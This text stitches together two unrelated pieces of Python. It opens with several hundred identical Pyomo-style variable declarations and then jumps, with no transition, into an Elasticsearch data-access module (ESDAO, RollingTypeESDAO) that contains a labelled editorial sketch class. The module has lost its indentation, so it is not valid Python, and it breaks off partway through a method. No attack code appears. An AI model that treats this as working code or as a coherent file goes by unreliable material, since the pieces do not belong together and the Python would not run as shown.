m.x3456 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3457 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3458 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3459 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3460 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3461 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3462 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3463 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3464 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3465 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3466 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3467 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3468 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3469 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3470 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3471 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3472 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3473 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3474 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3475 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3476 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3477 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3478 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3479 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3480 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3481 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3482 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3483 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3484 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3485 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3486 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3487 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3488 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3489 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3490 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3491 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3492 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3493 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3494 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3495 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3496 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3497 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3498 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3499 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3500 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3501 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3502 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3503 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3504 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3505 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3506 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3507 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3508 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3509 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3510 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3511 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3512 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3513 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3514 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3515 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3516 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3517 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3518 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3519 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3520 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3521 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3522 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3523 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3524 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3525 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3526 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3527 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3528 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3529 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3530 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3531 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3532 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3533 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3534 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3535 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3536 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3537 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3538 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3539 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3540 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3541 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3542 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3543 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3544 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3545 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3546 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3547 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3548 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3549 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3550 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3551 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3552 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3553 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3554 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3555 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3556 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3557 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3558 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3559 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3560 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3561 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3562 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3563 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3564 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3565 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3566 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3567 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3568 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3569 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3570 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3571 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3572 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3573 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3574 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3575 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3576 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3577 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3578 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3579 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3580 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3581 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3582 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3583 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3584 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3585 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3586 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3587 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3588 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3589 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3590 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3591 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3592 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3593 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3594 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3595 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3596 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3597 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3598 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3599 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3600 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3601 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3602 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3603 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3604 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3605 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3606 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3607 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3608 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3609 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3610 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3611 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3612 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3613 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3614 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3615 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3616 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3617 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3618 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3619 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3620 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3621 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3622 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3623 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3624 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3625 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3626 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3627 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3628 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3629 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3630 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3631 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3632 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3633 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3634 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3635 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3636 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3637 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3638 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3639 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3640 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3641 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3642 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3643 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3644 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3645 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3646 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3647 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3648 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3649 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3650 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3651 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3652 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3653 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3654 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3655 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3656 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3657 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3658 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3659 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3660 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3661 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3662 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3663 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3664 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3665 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3666 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3667 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3668 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3669 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3670 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3671 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3672 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3673 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3674 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3675 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3676 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3677 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3678 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3679 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3680 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3681 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3682 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3683 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3684 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3685 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3686 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3687 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3688 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3689 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3690 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3691 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3692 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3693 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3694 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3695 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3696 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3697 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3698 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3699 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3700 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3701 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3702 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3703 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3704 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3705 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3706 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3707 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3708 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3709 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3710 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3711 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3712 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3713 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3714 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3715 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3716 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3717 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3718 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3719 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3720 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3721 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3722 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3723 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3724 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3725 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3726 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3727 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3728 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3729 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3730 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3731 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3732 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3733 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3734 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3735 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3736 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3737 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3738 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3739 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3740 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3741 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3742 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3743 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3744 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3745 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3746 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3747 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3748 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3749 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3750 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3751 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3752 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3753 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3754 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3755 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3756 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3757 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3758 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3759 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3760 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3761 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3762 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3763 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3764 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3765 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3766 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3767 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3768 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3769 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3770 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3771 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3772 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3773 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3774 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3775 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3776 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3777 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3778 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3779 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3780 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3781 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3782 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3783 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3784 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3785 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3786 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3787 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3788 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3789 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3790 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3791 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3792 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3793 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3794 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3795 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3796 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
import esprit
from esprit import mappings
from octopus.core import app
import json as jsonlib
from datetime import datetime
import dateutil.relativedelta as relativedelta
import os, threading
from octopus.lib import plugin
from octopus.modules.es.initialise import put_mappings, put_example
class ESInstanceDAO(esprit.dao.DAO):
def __init__(self, type=None, raw=None, *args, **kwargs):
self._conn = esprit.raw.Connection(app.config.get('ELASTIC_SEARCH_HOST'), app.config.get('ELASTIC_SEARCH_INDEX'))
self._es_version = app.config.get("ELASTIC_SEARCH_VERSION")
self._type = type if type is not None else "index"
super(ESInstanceDAO, self).__init__(raw=raw)
def save(self, **kwargs):
self.prep()
super(ESInstanceDAO, self).save(**kwargs)
def json(self):
return jsonlib.dumps(self.data)
def mapping(self):
return {
self._type : {
self._type : app.config.get("ELASTIC_SEARCH_DEFAULT_MAPPING")
}
}
def _get_connection(self):
return self._conn
def _get_write_type(self):
return self._type
def _get_read_types(self):
return [self._type]
############################################
# subclasses should implement these methods if they want them
def prep(self):
pass
class ESDAO(esprit.dao.DomainObject):
__type__ = 'index'
__conn__ = esprit.raw.Connection(app.config.get('ELASTIC_SEARCH_HOST'), app.config.get('ELASTIC_SEARCH_INDEX'))
__es_version__ = app.config.get("ELASTIC_SEARCH_VERSION")
def __init__(self, *args, **kwargs):
super(ESDAO, self).__init__(*args, **kwargs)
#####################################################
## overrides on Domain Object
@classmethod
def delete_by_query(cls, query, conn=None, es_version="0.90.13", type=None):
esv = cls.__es_version__
if esv is None:
esv = es_version
super(ESDAO, cls).delete_by_query(query, conn=conn, es_version=esv, type=type)
def save(self, **kwargs):
self.prep()
super(ESDAO, self).save(**kwargs)
######################################################
## Octopus specific functions
@classmethod
def mappings(cls):
return {
cls.__type__ : {
cls.__type__ : app.config.get("ELASTIC_SEARCH_DEFAULT_MAPPING")
}
}
@classmethod
def example(cls):
return cls()
@classmethod
def self_init(cls, *args, **kwargs):
pass
def json(self):
return jsonlib.dumps(self.data)
def prep(self):
pass
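# ----------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not part of the original module):
# a concrete DAO is expected to subclass ESDAO, set its own __type__, and
# override hooks such as prep(), mappings() or example() where needed. The
# type name and the last_updated field below are assumptions for the example.
class ExampleRecordDAO(ESDAO):
    __type__ = "example_record"

    def prep(self):
        # stamp the record just before save() writes it to the index
        self.data["last_updated"] = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")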
class RollingTypeESDAO(ESDAO):
# should the dynamic type be checked for existence, and initialised
# with a mapping or an example document
__init_dynamic_type__ = False
# if initialising the dynamic type, should it use mappings()
__init_by_mapping__ = False
# if initialising the dynamic type, should it use example()
__init_by_example__ = False
# the order in which the DAO should look for an index type to query
__read_preference__ = ["next", "curr", "prev"]
# create a lock for this DAO to use so that the modifications to the files can
# be synchronised
_lock = threading.RLock()
@classmethod
def _mint_next_type(cls):
return cls.__type__ + datetime.utcnow().strftime("%Y%m%d%H%M%S")
@classmethod
def _roll_dir(cls):
return os.path.join(app.config.get("ESDAO_ROLLING_DIR"), cls.__type__)
# FIXME: these methods are not thread-safe. We need to migrate to ES's index alias
# feature instead
@classmethod
def _get_cfg(cls, pos):
# return app.config.get("ESDAO_ROLLING_{x}_{y}".format(x=pos.upper(), y=cls.__type__.upper()))
return None
@classmethod
def _set_cfg(cls, pos, val):
